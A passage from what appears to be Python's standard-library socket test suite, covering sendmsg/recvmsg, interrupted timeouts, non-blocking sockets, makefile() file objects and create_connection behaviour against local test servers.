def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
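# A minimal sketch of the pattern used below (assumptions: setitimer()
# is available and the SIGALRM handler from setUp is installed):
#     signal.signal(signal.SIGALRM, lambda signum, frame: 1 / 0)
#     signal.setitimer(signal.ITIMER_REAL, 0.05)
#     sock.recv(1024)   # expected to raise ZeroDivisionError from the handler
# Raising from the handler makes the interruption visible as an exception
# that cannot be confused with an ordinary socket error.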
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
self.addCleanup(self.setAlarm, 0)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises ZeroDivisionError (from
        # the SIGALRM handler) when interrupted by a signal.
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
@unittest.skipUnless(thread, 'Threading required for this test.')
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises
        # ZeroDivisionError (from the SIGALRM handler) when interrupted
        # by a signal.
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
        # Pass an actual address here, since Python's wrapper for
        # sendto() doesn't allow a zero-length one; POSIX requires the
        # address to be ignored anyway because the socket is
        # connection-mode.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
@unittest.skipUnless(thread, 'Threading required for this test.')
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
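    # Illustrative sketch of the property being relied upon (not run by
    # these tests; `conn` is a hypothetical connected socket):
    #     f1 = conn.makefile('rb', 0)
    #     first = f1.readline()    # reads exactly one line, buffers nothing
    #     f2 = conn.makefile('rb', 0)
    #     second = f2.readline()   # still sees the following line intact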
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
        # Avoid closing the socket before the server test has finished,
        # otherwise the system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
        # platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
try:
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
